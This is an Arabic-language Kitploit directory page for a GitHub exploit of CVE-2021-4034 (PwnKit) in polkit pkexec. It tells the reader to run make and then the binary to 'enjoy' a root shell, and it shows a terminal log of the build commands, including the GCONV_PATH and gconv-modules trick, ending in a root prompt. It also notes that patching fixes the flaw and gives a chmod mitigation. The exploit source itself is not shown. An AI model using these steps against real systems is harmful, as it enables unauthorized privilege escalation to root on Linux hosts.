Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2021-4034 — استغلال لثغرة CVE-2021-4034 في polkit pkexec، يوفر شل صلاحيات الجذر عبر تصعيد الامتيازات SUID. يتضمن الكود المصدري وتعليمات البناء. | Kitploit
أدوات/GitHubGitHub/tanmay-n/cve-2021-4034
تصعيد الامتيازاتأطر الاستغلالتحليل الثغرات الأمنيةالاستغلالاستغلال الملفات الثنائية
GitHubtanmay-n/cve-2021-4034

CVE-2021-4034

استغلال لثغرة CVE-2021-4034 في polkit pkexec، يوفر شل صلاحيات الجذر عبر تصعيد الامتيازات SUID. يتضمن الكود المصدري وتعليمات البناء.

عرض المستودع
1منذ 4 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-4034

استغلال تصعيد الامتيازات في polkit

فقط نفّذ make، ثم ./cve-2021-4034 واستمتع بجذر (root shell).

النشرة الأصلية من فريق Qualys الخاص بي هنا

PoC

إذا كان الاستغلال يعمل، ستحصل على جذر (root shell) فورًا:

root@kitploit:~
kali@user:~/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp /usr/bin/true GCONV_PATH=./pwnkit.so:.
kali@user:~/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# exit

تحديث polkit على معظم الأنظمة سيصلح الثغرة، لذلك ستحصل على رسالة الاستخدام وسيخرج البرنامج:

root@kitploit:~
kali@user:~/CVE-2021-4034$ ./cve-2021-4034
pkexec --version |
       --help |
       --disable-internal-agent |
       [--user username] PROGRAM [ARGUMENTS...]

See the pkexec manual page for more details.
kali@user:~/CVE-2021-4034$

حول Polkit pkexec لنظام Linux

Polkit (المعروف سابقًا باسم PolicyKit) هو مكوّن للتحكم في الامتيازات على مستوى النظام في أنظمة التشغيل الشبيهة بـ Unix. يوفر طريقة منظمة للعمليات غير المميزة للتواصل مع العمليات المميزة. من الممكن أيضًا استخدام polkit لتنفيذ الأوامر بامتيازات مرتفعة باستخدام الأمر pkexec متبوعًا بالأمر المطلوب تنفيذه (بصلاحية الجذر).

التخفيف

إذا لم تتوفر تصحيحات لنظام التشغيل الخاص بك، يمكنك إزالة بت SUID من pkexec كإجراء تخفيف مؤقت.

root@kitploit:~
# chmod 0755 /usr/bin/pkexec
تنزيل الأداة